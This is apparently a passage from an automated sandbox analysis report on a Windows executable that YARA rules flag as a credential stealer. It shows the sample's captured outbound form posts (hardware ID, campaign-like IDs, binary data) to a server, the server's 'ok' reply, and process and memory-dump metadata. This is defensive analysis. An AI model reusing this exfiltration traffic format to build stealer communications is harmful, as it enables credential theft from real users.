2024-12-26 11:46:12 UTC  15331 bytes  OUT  Data Raw: 2d 2d 32 31 48 5a 56 50 38 42 5a 4c 39 47 5a 53 35 4e 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 37 36 36 46 37 45 34 44 44 37 43 34 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 31 48 5a 56 50 38 42 5a 4c 39 47 5a 53 35 4e 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 31 48 5a 56 50 38 42 5a 4c 39 47 5a 53 35 4e 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
Data Ascii: --21HZVP8BZL9GZS5N5LContent-Disposition: form-data; name="hwid"73766F7E4DD7C48FBEBA0C6A975F1733--21HZVP8BZL9GZS5N5LContent-Disposition: form-data; name="pid"3--21HZVP8BZL9GZS5N5LContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-26 11:46:12 UTC  4632 bytes  OUT  Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de
Data Ascii: +?2+?2+?o?Mp5p_
2024-12-26 11:47:22 UTC  1129 bytes  IN  HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:47:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gku4cpioudts31ighhpeoiagpk; expires=Mon, 21 Apr 2025 05:34:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0T35LOi7ESDNx9kOh74RTstqoHFYEd7RM51gUQmct80KCtIrXXTezL05cfCNnRppjisF6yF%2FvuocliSVjlmzoQECBsi5GgAFC0FAcWAYou56kehpEyDuv%2Fi%2BoMwaBctuss%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d43cc87a7d02-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1794&rtt_var=688&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20924&delivery_rate=1574123&cwnd=230&unsent_bytes=0&cid=a784f58151514e02&ts=69942&x=0"
2024-12-26 11:47:22 UTC  20 bytes  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:47:22 UTC  5 bytes  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 06:45:09
Start date: 26/12/2024
Path: C:\Users\user\Desktop\XM6cn2uNux.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\XM6cn2uNux.exe"
Imagebase: 0x3d0000
File size: 1'887'232 bytes
MD5 hash: A3F5C08AC61228829905F46D3E4E9DC5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2777182643.0000000001263000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01205000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
Memory Dump Source
• Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01208000, based on PE: false
• Associated: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
Memory Dump Source
• Source File: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
• Associated: 00000000.00000003.3516588604.000000000122D000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
Memory Dump Source
• Source File: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0122E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
Memory Dump Source
• Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01205000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd
Memory Dump Source
• Source File: 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Offset: 01208000, based on PE: false
• Associated: 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1205000_XM6cn2uNux.jbxd